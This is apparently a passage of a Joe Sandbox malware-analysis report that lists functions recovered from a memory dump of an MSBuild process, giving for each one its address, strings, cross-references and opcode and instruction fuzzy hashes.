LdrResSearchResource Enter, xrefs: 01A6AA13

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: ef0bdeaa1f1f8eb19891d6ae1808a39de71bc2c5c3a7ee76030537364a08f359
Instruction ID: fcc573fa977d1dc25db0094ac37666a510d891a80665959ab24d4d5acfe3ca40
Opcode Fuzzy Hash: ef0bdeaa1f1f8eb19891d6ae1808a39de71bc2c5c3a7ee76030537364a08f359
Instruction Fuzzy Hash: FDE14B71E00219AFEF22CF99CA80BAEBBB9FF59710F14452AEA01F7251D7749941CB50

Function 01B2A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01B2A551
`, xrefs: 01B2A44B

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bb15df904c2d99b59f7e13574f609963027a95bd63854543195a05f2ccba35d8
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 83C1D0312043529BEB29CF28C841B6BBBE5EFD4718F084A6DF69ACB690D774D509CB41

Function 01ADE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 01ADE751
Legacy, xrefs: 01ADE75A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 446d2670cd97cb6a80f1bd534a97434f607f8cb3c6377eac28ffe9e7c033894b
Instruction ID: 63767cbbc762c2d1ffd692062ce4ca77b49128b5d5ac02e054fc0254a0cf0a06
Opcode Fuzzy Hash: 446d2670cd97cb6a80f1bd534a97434f607f8cb3c6377eac28ffe9e7c033894b
Instruction Fuzzy Hash: C6615CB1E00B099FDB25DFA8C941BADBBB9FB48700F14406DE65AEB251D731AD40CB50

Function 01B043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01B04525
@, xrefs: 01B04437

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 70832b831d7d9d4e7092a1d7d6080776e13739a64ad4c55fd9965294dcb65843
Instruction ID: 1f9f897c93dbbc13fd9b830e16f2b258874bebddeb47298e783ccc7b0e48fd89
Opcode Fuzzy Hash: 70832b831d7d9d4e7092a1d7d6080776e13739a64ad4c55fd9965294dcb65843
Instruction Fuzzy Hash: 8A51F9B1E0021DAFDF15DFA9CD80AEEBBBDEB44654F10056AE611B7290D731AA05CB60

Function 01A604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A6063D
kLsE, xrefs: 01A60540

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 232b47e0da028b61ea3e9ebe6fb946c6775c761ff45c00d10edf9ff2118f1751
Instruction ID: b314ca7038b0210226fc2e5402660e570e3c70d37f4137bb2e80d418d6ec6126
Opcode Fuzzy Hash: 232b47e0da028b61ea3e9ebe6fb946c6775c761ff45c00d10edf9ff2118f1751
Instruction Fuzzy Hash: C151D0755007429FD725EF78C6406A7BBE8AF84704F10883EFADA87241E7B4D985CB92

Function 01A6A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 01A6A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 01A6A309

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 7aa65f0eb4b5a03e33b50b45608310e8042e0f84a9311aade94ac6be9571e2d2
Instruction ID: 6e9d728a52cccf3ef614b5626f94d3b22201e2230067bf381f1cc4e52804f5ea
Opcode Fuzzy Hash: 7aa65f0eb4b5a03e33b50b45608310e8042e0f84a9311aade94ac6be9571e2d2
Instruction Fuzzy Hash: F441AF35A04645DBEB11CF59C840B6EBBB8FF85700F1880AAEA15EB391E3B5DA40CB51

Function 01AE07C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

=u@(, xrefs: 01AE07DF, 01AE081F
=u@, xrefs: 01AE085A, 01AE0894

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: =u@$=u@(
API String ID: 0-3143657753
Opcode ID: 87a2c67daa27ba244ee8589f80757f8d4dc217b01343c12b4d4af97b98329f18
Instruction ID: b8812483c13aad451bc3ea29bb79a0a79e8d3c36ff3ed3a56cfda1d383b6836a
Opcode Fuzzy Hash: 87a2c67daa27ba244ee8589f80757f8d4dc217b01343c12b4d4af97b98329f18
Instruction Fuzzy Hash: 3E41AD72608345AFD720DF29C845B9BFBE8FF88624F004A2EF998D7251D7709904CB92

Function 01A9A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 01A9A5E4
Threadpool!, xrefs: 01A9A5E9

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 73655811f0df46669af07d9bca2e3c2e70cc0f03f6d71523748d930d8ddee8da
Instruction ID: c8ae04cf7218cb7db127c0142c1e3bcdba46b22e6983a37c03ff368d887bc29d
Opcode Fuzzy Hash: 73655811f0df46669af07d9bca2e3c2e70cc0f03f6d71523748d930d8ddee8da
Instruction Fuzzy Hash: F301D1B2640704AFD711DF18CE45B167BE8E784716F05893AB648C7190E334D844CB86

Function 01A6C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01A6C8C3, 01A6CA40

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 053ecd41130792162e82884f4c5924e5d9fd0e1dada9328530c7b4b0702b9316
Instruction ID: 6137101cdd2ef293cc9c57a482957e1c843229b3001e66e1a212483e81ddc101
Opcode Fuzzy Hash: 053ecd41130792162e82884f4c5924e5d9fd0e1dada9328530c7b4b0702b9316
Instruction Fuzzy Hash: 43829B75E002188FEB25CFA9C880BEDBBB9FF48760F148169D999AB355D7309D41CB50

Function 01AE6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01AE65C1

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a4d1abd159d048bdcd30a5d2c2e1430eab4ab0db49c8af03959e2286319c931f
Instruction ID: 217014785321c6a4c5da4b65692ade8ed1d1b1a8f9b910535e3e2f6c47e92cce
Opcode Fuzzy Hash: a4d1abd159d048bdcd30a5d2c2e1430eab4ab0db49c8af03959e2286319c931f
Instruction Fuzzy Hash: D8915171A40219AFEB21EFA5CD85FAEBBB8EF14B50F140455F604AB191D774ED04CBA0

Function 01B0E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01B0E1FA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f2d86f2ecdd9423d89e73ba8e9b1182be467f924771eaf21249cc0cff45eca26
Instruction ID: 99a1ed94c61dfb5b148705dd8b6bba2110621d5ee466df7da3f65bd6e71d834d
Opcode Fuzzy Hash: f2d86f2ecdd9423d89e73ba8e9b1182be467f924771eaf21249cc0cff45eca26
Instruction Fuzzy Hash: 0991AC7290120AAEDF2BABA5DD84FAFBFB9EF45740F100469F505A7290DB74D901CB90

Function 01A9A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01AD67C9

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 33385500fab9ee42baf8ace5985552b9ae5d70539d4d6752e67a250d2d6519a4
Instruction ID: 77cb93af481d39e796755c35a7a219a65559b9a2533a66eefe6c820dac275edb
Opcode Fuzzy Hash: 33385500fab9ee42baf8ace5985552b9ae5d70539d4d6752e67a250d2d6519a4
Instruction Fuzzy Hash: F3718FB5E0060ADFDF29CF9CD5916EDBBB1BF98700F14812EE90AA7241E7349941CB60

Function 01B04978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01B04A7F

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 046b10768d0c2cda4c1ead93e06af35e3fe265d8f453dcf9d00a3a732459c063
Instruction ID: f598b046967f6363318599bad9bb62f5e153245ad247d070484d9df4ac31d7d6
Opcode Fuzzy Hash: 046b10768d0c2cda4c1ead93e06af35e3fe265d8f453dcf9d00a3a732459c063
Instruction Fuzzy Hash: C851B472D006299FDF1ADF99D940AAEBFB4EF08700F0541A9EB11B7290D3749901CBA0

Function 01A7E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01A7E6A4

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 55a0c31612e703be1d5c3d245976a212f003f6198fbcfd77aa18b6fc9dd4519e
Instruction ID: 0e522ce2f5d344d255469cee1642eb06df9c12afa58a8da3ca6f6f8ee1760d76
Opcode Fuzzy Hash: 55a0c31612e703be1d5c3d245976a212f003f6198fbcfd77aa18b6fc9dd4519e
Instruction Fuzzy Hash: A6417F72608342ABD711DB79CD80B6BBBE8AF88B14F44496DFA84D7140E774DA08C796

Function 01ADC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01ADC77F

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: cda5908e31f58a511348a07034b7512d13177abdcaa532ff80ce449b582144f7
Instruction ID: 252c987f4b7613a793379bed027d900503ea29e0a9371312999ea5cfe46b979b
Opcode Fuzzy Hash: cda5908e31f58a511348a07034b7512d13177abdcaa532ff80ce449b582144f7
Instruction Fuzzy Hash: AC4145B1D0052DABDB21DB60CD85FDEB77CAB44724F4045A9E709A7140DB709E89CF94

Function 01AF6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01AF6B91

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ffdb94e485e48b59a8ee9eadb384865852dac1356621622b04e5ad6335025ea8
Instruction ID: 03808e1cc6c825d5ce925bb6ebb15270cd09eb3dcc50b94a39966b9c2a404522
Opcode Fuzzy Hash: ffdb94e485e48b59a8ee9eadb384865852dac1356621622b04e5ad6335025ea8
Instruction Fuzzy Hash: 14310A31A007199BEB22DFA9C850BBE7BB8DF05704F54406CFA89AB282D775DD06CB50

Function 01AE892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AE895E

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: c1b1230b9d193fe67e0ac1622f7bfa9557369ed003898292b4994d3bb01ec08a
Instruction ID: 339830f19a24ebe4add61d5b7f45c4f1555e4e09334a0c8f8abf833844694c8a
Opcode Fuzzy Hash: c1b1230b9d193fe67e0ac1622f7bfa9557369ed003898292b4994d3bb01ec08a
Instruction Fuzzy Hash: B6012632600305EFE7366B5ADD8CB5A7FE5EF85295B08006CFA4287152CB25B840C793

Function 01B02000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02a93f51a978e577ff46bbc19f3e372b0897bf76eeaeb68603ba218b1533430
Instruction ID: 564d51f4ce2e5cd234b1155c579b31a762f3a3ef11353d4595b22d983f329671
Opcode Fuzzy Hash: b02a93f51a978e577ff46bbc19f3e372b0897bf76eeaeb68603ba218b1533430
Instruction Fuzzy Hash: 1342C5356083419FE72ACF68C894A6BBFE5FF84340F0449ADFA8687290D771D949CB52

Function 01AF8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a9a6a5238c6c4f0b06882236edb44af79979ae04a2b6d2dd1bc00540ac33d1
Instruction ID: 020a131bfd4db948e542504deb212da6741456a85930c282b8e572a7e91b1098
Opcode Fuzzy Hash: 91a9a6a5238c6c4f0b06882236edb44af79979ae04a2b6d2dd1bc00540ac33d1
Instruction Fuzzy Hash: E2424F75E002198FEB25CFA9C841BADBBF5BF48301F14819DEA49EB252D7389985CF50

Function 01A72840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed667e8f66b2cfe1e42dc828b1350654ba507146b740539eadd04775157c7d9
Instruction ID: e1ae5c7188f2e9efc965594ec02fe79bc118ea3b4776ce15317df4e4ac3dd08e
Opcode Fuzzy Hash: aed667e8f66b2cfe1e42dc828b1350654ba507146b740539eadd04775157c7d9
Instruction Fuzzy Hash: CC32E270A007598FDB29CF69C9447BEBBF2BF84B04F28411DD58A9B385DB35A942CB50

Function 01B0A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55204ec8ea325140cf48424586f80d77378a4cd389075ea8ccf4ea40240f05ed
Instruction ID: 10c53e3c6ad083a52b2ae0db4bd5465ac54d4a18005cb1d79122705d1a659608
Opcode Fuzzy Hash: 55204ec8ea325140cf48424586f80d77378a4cd389075ea8ccf4ea40240f05ed
Instruction Fuzzy Hash: 6D22AC742047618AEB2ACF39C490376BFF1EF45340F088AD9E9868B2C6D775E452CB60

Function 01A84A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 245a8828533e92c07b0a02c760ba5d0a33a41c24f608e421dd4e4681bf527d4a
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 4CF15E71E0021A9FDF19DFA9C980BAEBBF5AF48754F08812DE905AB340E775D841CB60

Function 01AF892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d4c263934f459b5070e198f4146e771bf735d9128d7430200adc6d7868e2ad
Instruction ID: aff4dbd68edf61ab0e3bc310194e5b0d8d34342cc0eb3d758c31b6ed29068fdd
Opcode Fuzzy Hash: 25d4c263934f459b5070e198f4146e771bf735d9128d7430200adc6d7868e2ad
Instruction Fuzzy Hash: 55D1C271E0060A9BDF15CFA9C841BBEB7F1EF88304F19816DEA55E7241D739E9068B60

Function 01A665D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a49df23a2bea2c73932ab6cb7f1efd3669de8c320d2e9b45975f157f582c22a
Instruction ID: fae99f8b9f14cda9e34e099db72a9551ee258f0100154fb00873f29137e00cef
Opcode Fuzzy Hash: 7a49df23a2bea2c73932ab6cb7f1efd3669de8c320d2e9b45975f157f582c22a
Instruction Fuzzy Hash: FAE1AF71608342CFC715CF28C590A6ABBF4FF89314F058A6DE99987352EB35E905CB92

Function 01A58397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fc235dc488139a1f4847e47583f5c89bb7b68b4f20cd8fa18248b71ad20ab5
Instruction ID: 9ff033ab6c04f5ad4c15bec932805357d633b1230923c6e163db28680f80c057
Opcode Fuzzy Hash: 29fc235dc488139a1f4847e47583f5c89bb7b68b4f20cd8fa18248b71ad20ab5
Instruction Fuzzy Hash: 3DD1F271A04206DBDB54DF2AC9D0ABAB7B9FF54304F08462DED16DB281E738E951CB60

Function 01AE8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: a02360a00a9f0316eb15c6962c4bee42a75e9811ad1ce1d5901dfd5b81c3029b
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 17B17174A00705AFDF24DF99C948AABBBF9FF84304F14446DEA1297794DA38E945CB10

Function 01A70535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: c928290b7b72c497704d5c410a2328f731f76cafb2b1c5a5c220745bdb8cb66f
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 57B13631704646AFDF25CB68CD50BBEBBF6AF49600F194199E642DB281DB30EE41CB90

Function 01A683C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50fb64c95a5872439585c5ca28fd85173f23e75c2150f57d1e34fa2caa862939
Instruction ID: 6e36789fed90134a44ad6c3aff033bc423d4bae6c954707dca2ce22047bbd591
Opcode Fuzzy Hash: 50fb64c95a5872439585c5ca28fd85173f23e75c2150f57d1e34fa2caa862939
Instruction Fuzzy Hash: 69C13774208341CFD764CF29C494BABB7E9BF88704F44496DE98987291D778EA09CF92

Function 01A5C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a741dcce68c68157cab77fcb2154ef8c18d4d7552dca5dff85c9021456ad20c7
Instruction ID: 6ed42f29ad7ad50e723823110ed503401312678e8d18165f36a53e92172688fc
Opcode Fuzzy Hash: a741dcce68c68157cab77fcb2154ef8c18d4d7552dca5dff85c9021456ad20c7
Instruction Fuzzy Hash: 31B18370A043658BDB65DF68C980BA9B3F5EF44714F0485E9D90AEB249EB70DE85CB20

Function 01A8E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24af09f4979c4b08a9623a578b1fbceb643e1ab02a5a72a748ed30d67386f2
Instruction ID: 97b3d2f008fac3d51c82c7dfe75fd34189b65cf8763d8f2ce94ba6b9de42256c
Opcode Fuzzy Hash: 9e24af09f4979c4b08a9623a578b1fbceb643e1ab02a5a72a748ed30d67386f2
Instruction Fuzzy Hash: BCA12631E00659EFEB21EB9CC944FAEBBB5BF04B14F054129EA11AB291D7749D40CBD1

Function 01AA0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b54e569dc1b7e0dea7b16006bbccc62a011bdf5df1cc1de792866ea98b8c712
Instruction ID: 34ba037e9cf5b6b7d1d268e3587e4736f97ba490a2938bd8a0bd44ca35ef7a6b
Opcode Fuzzy Hash: 8b54e569dc1b7e0dea7b16006bbccc62a011bdf5df1cc1de792866ea98b8c712
Instruction Fuzzy Hash: 9EA1B270B007169FEB25DF69CA90BAAB7B5FF54314F444029FA46D7282EB34E815CB90

Function 01B34500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a43a3082c4fb587901a57b6900fae82c25b33d24b9701bd09bc3ae91f9112ee5
Instruction ID: 38b8ad0f9b3615c90e8c131dabf1318bfbc0ad97f8d3e8b3fc5b54a728cbf1d6
Opcode Fuzzy Hash: a43a3082c4fb587901a57b6900fae82c25b33d24b9701bd09bc3ae91f9112ee5
Instruction Fuzzy Hash: CDA1E072A04212EFC71ADF28C980B6ABBE9FF88704F4506A9F545DB651D334ED20CB91

Function 01B32B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: 5924df047b858d9bc88ab178495d7bf98bfb5b13307f85a5ba7f1a808774555c
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: 04B13B71E0061ADFDF19CFADC980AADBBB5FF88310F1481A9E914A7354D730A955CBA0

Function 01AE60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea40732268ceb40d5a65720a0de765a350603d3a07a0752b199ce95d9e0221bf
Instruction ID: 692199184260df22885492eb18d868078ca7393c2fc023e1683cce7417a61b86
Opcode Fuzzy Hash: ea40732268ceb40d5a65720a0de765a350603d3a07a0752b199ce95d9e0221bf
Instruction Fuzzy Hash: A391A271D00216AFDF15CFA8D888BBEBFF5AF58710F154969E614AB341D734E9009BA0

Function 01A7E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e2c178a7018383accffc68d44da34284dbf7d05c49025733b94db1bbb4b729
Instruction ID: 67436dd34aac6cf93d407fcecde709f277c4c1cab77a739c51732d29f36e5379
Opcode Fuzzy Hash: b0e2c178a7018383accffc68d44da34284dbf7d05c49025733b94db1bbb4b729
